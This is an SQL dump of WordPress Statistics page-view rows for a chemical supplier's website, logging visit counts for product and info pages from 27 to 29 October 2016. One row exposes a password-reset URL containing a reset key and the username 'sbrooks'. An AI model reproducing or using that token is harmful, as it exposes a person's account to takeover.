INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-ac/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 672); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-738/', '2016-10-27', 1, 1840); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/lost-password/', '2016-10-27', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-account/', '2016-10-27', 3, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/?remove_from_wishlist_after_add_to_cart=1149', '2016-10-27', 3, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/milsolv-medical-solvents/', '2016-10-27', 1, 473); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/', '2016-10-27', 1, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-407/', '2016-10-27', 1, 1111); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-215/', '2016-10-27', 5, 822); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-217/', '2016-10-27', 1, 824); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-215/?wc-ajax=get_refreshed_fragments', '2016-10-27', 3, 822); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vydax-nrt-960/', '2016-10-27', 1, 1683); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-580582/', '2016-10-27', 1, 1705); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-580582/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 1705); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122adl-low-global-warming-release-agent/', '2016-10-27', 1, 2763); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122adl-low-global-warming-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 2763); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-severe-service-grease/', '2016-10-27', 1, 1104); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-silicone-lubricant/', '2016-10-27', 1, 1819); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/vazo-64-aibn/', '2016-10-27', 1, 1279); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/vazo-64-aibn/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 1279); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/conformal-coating-stripper/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 623); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/', '2016-10-27', 1, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3282/', '2016-10-27', 1, 1193); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3282/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 1193); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-560562/', '2016-10-27', 2, 1695); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-555557/', '2016-10-27', 1, 1384); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-mca/', '2016-10-27', 5, 1263); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/pfpe-re-move-ms-250252/', '2016-10-27', 1, 1711); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/pfpe-re-move-ms-250252/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 1711); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1001f/', '2016-10-27', 2, 924); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ts4-thread-sealant/', '2016-10-27', 1, 989); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1001f/?wc-ajax=get_refreshed_fragments', '2016-10-27', 2, 924); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ts4-thread-sealant/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 989); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-electronic-coating/', '2016-10-27', 1, 732); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-752u/', '2016-10-27', 1, 1834); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-mca/?wc-ajax=get_refreshed_fragments', '2016-10-27', 3, 1263); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-830/', '2016-10-27', 1, 882); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240az/', '2016-10-27', 1, 638); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240az/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 638); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-prepare-bearings/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 2507); 
INSERT INTO `wp_statistics_pages` VALUES ('/troubleshooting-common-mold-release-issues/', '2016-10-27', 1, 2694); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive/', '2016-10-27', 1, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/', '2016-10-27', 1, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-10-28', 70, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/', '2016-10-28', 12, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-10-28', 22, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-10-28', 342, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/', '2016-10-28', 5, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/?wc-ajax=get_refreshed_fragments', '2016-10-28', 4, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-conformal-coatings/', '2016-10-28', 2, 620); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-10-28', 8, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating/', '2016-10-28', 1, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-10-28', 92, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/', '2016-10-28', 5, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/?wc-ajax=get_refreshed_fragments', '2016-10-28', 3, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/', '2016-10-28', 3, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67-radical-initiator/', '2016-10-28', 4, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/', '2016-10-28', 4, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/?wc-ajax=get_refreshed_fragments', '2016-10-28', 2, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/surface-prepclean-ms-255257/', '2016-10-28', 23, 1712); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/', '2016-10-28', 1, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-242l-quik-freeze-antistatic-ultra/', '2016-10-28', 1, 2795); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-242l-quik-freeze-ultra/', '2016-10-28', 1, 2788); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-242l-quik-freeze-ultra/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 2788); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-242l-quik-freeze-antistatic-ultra/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 2795); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-antistatic/', '2016-10-28', 1, 1726); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson/', '2016-10-28', 17, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-10-28', 35, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-10-28', 12, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-10-28', 22, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/', '2016-10-28', 2, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/?wc-ajax=get_refreshed_fragments', '2016-10-28', 2, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122xd/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 1681); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-nrt-8908/', '2016-10-28', 1, 881); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-104/', '2016-10-28', 5, 439); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-104/?wc-ajax=get_refreshed_fragments', '2016-10-28', 5, 439); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/', '2016-10-28', 1, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/?wc-ajax=get_refreshed_fragments', '2016-10-28', 3, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/?wc-ajax=get_refreshed_fragments', '2016-10-28', 5, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ks-1220/', '2016-10-28', 3, 2460); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ks-1220/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 2460); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/lost-password/', '2016-10-28', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/lost-password/?reset-link-sent=true', '2016-10-28', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/lost-password/?key=A0TySe3WeB3jn2xnpGRq&amp;login=sbrooks', '2016-10-28', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-product-selection-guide/', '2016-10-28', 1, 2317); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/?wc-ajax=get_refreshed_fragments', '2016-10-28', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-226/', '2016-10-28', 2, 850); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-10-28', 8, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/?wc-ajax=get_refreshed_fragments', '2016-10-28', 6, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/', '2016-10-28', 13, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3164/', '2016-10-28', 2, 1181); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3164/?wc-ajax=get_refreshed_fragments', '2016-10-28', 2, 1181); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-10-28', 9, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122xd/', '2016-10-28', 1, 1681); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?wc-ajax=get_refreshed_fragments', '2016-10-28', 6, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52-radical-initiator/vazo-52-5/', '2016-10-28', 1, 1341); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52-radical-initiator/vazo-52-5/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 1341); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-226/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 850); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/?wc-ajax=get_refreshed_fragments', '2016-10-28', 9, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-28', 4, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry', '2016-10-28', 6, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry/', '2016-10-28', 5, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1002f/', '2016-10-28', 1, 937); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1002f/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 937); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/', '2016-10-28', 3, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/?wc-ajax=get_refreshed_fragments', '2016-10-28', 2, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52-radical-initiator/', '2016-10-28', 4, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/', '2016-10-28', 5, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-720722/', '2016-10-28', 6, 1706); 
INSERT INTO `wp_statistics_pages` VALUES ('/military-spec-chemicals/shutterstock_296498720/', '2016-10-28', 3, 2779); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-214/', '2016-10-28', 2, 821); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-214/?wc-ajax=get_refreshed_fragments', '2016-10-28', 2, 821); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-resin-conformal-coatings/', '2016-10-28', 4, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/', '2016-10-28', 2, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/143ac/', '2016-10-28', 4, 582); 
INSERT INTO `wp_statistics_pages` VALUES ('/terms-conditions/', '2016-10-28', 2, 2150); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-mold-release-agent/', '2016-10-28', 4, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-mold-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agent/', '2016-10-28', 2, 302); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-826/', '2016-10-28', 3, 861); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-826/?wc-ajax=get_refreshed_fragments', '2016-10-28', 3, 861); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents-2/', '2016-10-28', 4, 425); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-215/', '2016-10-28', 1, 822); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-215/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 822); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122adl/', '2016-10-28', 1, 1679); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240az/', '2016-10-28', 1, 638); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/military-spec-chemicals/', '2016-10-28', 2, 2773); 
INSERT INTO `wp_statistics_pages` VALUES ('/military-spec-chemicals/?wc-ajax=get_refreshed_fragments', '2016-10-28', 2, 2773); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/', '2016-10-28', 3, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/?wc-ajax=get_refreshed_fragments', '2016-10-28', 3, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl', '2016-10-28', 1, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents/', '2016-10-28', 1, 310); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-720l/', '2016-10-28', 2, 1707); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-755l-flux-remover/', '2016-10-28', 2, 1690); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/', '2016-10-28', 2, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-124h/', '2016-10-28', 2, 1673); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-124h/?wc-ajax=get_refreshed_fragments', '2016-10-28', 2, 1673); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-lvp/', '2016-10-28', 1, 862); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/', '2016-10-28', 2, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-862/', '2016-10-28', 5, 887); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-862/?wc-ajax=get_refreshed_fragments', '2016-10-28', 3, 887); 
INSERT INTO `wp_statistics_pages` VALUES ('/hexion-epon-resin-8021/', '2016-10-28', 1, 1466); 
INSERT INTO `wp_statistics_pages` VALUES ('/hexion-epon-resin-8021/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 1466); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/the/', '2016-10-28', 1, 1097); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-164/', '2016-10-28', 1, 955); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/universal-ptfe-release-agent/', '2016-10-28', 1, 305); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agents/', '2016-10-28', 3, 303); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-815c/', '2016-10-28', 1, 910); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agents/', '2016-10-28', 1, 2312); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/', '2016-10-28', 8, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?print=y', '2016-10-28', 1, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/hexion-epon-resin-826/', '2016-10-28', 2, 1463); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-agl-683/', '2016-10-28', 1, 1072); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-mca/', '2016-10-28', 2, 1263); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-mca/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 1263); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-407/', '2016-10-28', 1, 1111); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-407/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 1111); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-specialty-solvent/', '2016-10-28', 1, 2618); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-xf/', '2016-10-28', 2, 1278); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agent/', '2016-10-28', 1, 182); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 182); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents/releasys-89/', '2016-10-28', 1, 340); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents/releasys-89/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 340); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dental-lubricant/', '2016-10-28', 1, 474); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry/?wc-ajax=get_refreshed_fragments', '2016-10-28', 2, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant/', '2016-10-28', 1, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form', '2016-10-28', 1, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/', '2016-10-28', 2, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-8021/', '2016-10-28', 2, 970); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-8021/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 970); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-730l-contact-re-nu/', '2016-10-28', 1, 2800); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-severe-service-grease/', '2016-10-28', 2, 1104); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/conformal-coating-stripper/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 623); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/spray-trigger/', '2016-10-28', 1, 1852); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-280282/', '2016-10-28', 2, 1713); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-227/', '2016-10-28', 1, 852); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents/580n-582nb/', '2016-10-28', 1, 325); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents/580n-582nb/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 325); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-580582/', '2016-10-28', 2, 1705); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/cobra-duster/', '2016-10-28', 5, 1851); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/cobra-duster/?wc-ajax=get_refreshed_fragments', '2016-10-28', 5, 1851); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/ms-907/', '2016-10-28', 1, 1150); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/ms-907/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 1150); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-203/', '2016-10-28', 1, 784); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-203/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 784); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3282/', '2016-10-28', 1, 1193); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3282/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 1193); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson', '2016-10-28', 1, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/hexion-epon-resin-826/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 1463); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/eponex-1510/', '2016-10-28', 1, 986); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/eponex-1510/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 986); 
INSERT INTO `wp_statistics_pages` VALUES ('/troubleshooting-common-mold-release-issues/', '2016-10-28', 1, 2694); 
INSERT INTO `wp_statistics_pages` VALUES ('/troubleshooting-common-mold-release-issues/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 2694); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdx/', '2016-10-28', 1, 697); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdx/?wc-ajax=get_refreshed_fragments', '2016-10-28', 1, 697); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-10-29', 177, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-10-29', 42, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-10-29', 13, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-580582/', '2016-10-29', 6, 1705); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-107/?wc-ajax=get_refreshed_fragments', '2016-10-29', 1, 442); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account', '2016-10-29', 3, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-10-29', 13, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-x-si', '2016-10-29', 1, 2344); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-x-si/', '2016-10-29', 2, 2344); 
INSERT INTO `wp_statistics_pages` VALUES ('/index.php', '2016-10-29', 2, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/rust-inhibitor/', '2016-10-29', 2, 1724); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/rust-inhibitor/?wc-ajax=get_refreshed_fragments', '2016-10-29', 1, 1724); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/conductive-coating/', '2016-10-29', 1, 1722); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3270/', '2016-10-29', 1, 1063); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a0/', '2016-10-29', 1, 1002); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-104/', '2016-10-29', 1, 439); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/', '2016-10-29', 1, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/', '2016-10-29', 2, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/?wc-ajax=get_refreshed_fragments', '2016-10-29', 2, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67-radical-initiator/', '2016-10-29', 3, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-29', 1, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-10-29', 5, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?wc-ajax=get_refreshed_fragments', '2016-10-29', 2, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a6/', '2016-10-29', 1, 1015); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a6/?wc-ajax=get_refreshed_fragments', '2016-10-29', 1, 1015); 
INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant/', '2016-10-29', 1, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant/?wc-ajax=get_refreshed_fragments', '2016-10-29', 1, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products', '2016-10-29', 3, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson/', '2016-10-29', 10, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents/', '2016-10-29', 1, 310); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents/?wc-ajax=get_refreshed_fragments', '2016-10-29', 1, 310); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/surface-prepclean-ms-255257/', '2016-10-29', 15, 1712); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-10-29', 7, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-10-29', 5, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles', '2016-10-29', 3, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/?wc-ajax=get_refreshed_fragments', '2016-10-29', 2, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson', '2016-10-29', 2, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact', '2016-10-29', 2, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-10-29', 4, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-resin-conformal-coatings/', '2016-10-29', 4, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/', '2016-10-29', 2, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/news', '2016-10-29', 2, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents', '2016-10-29', 3, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/', '2016-10-29', 3, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support', '2016-10-29', 3, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-10-29', 4, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating', '2016-10-29', 2, 2474); 
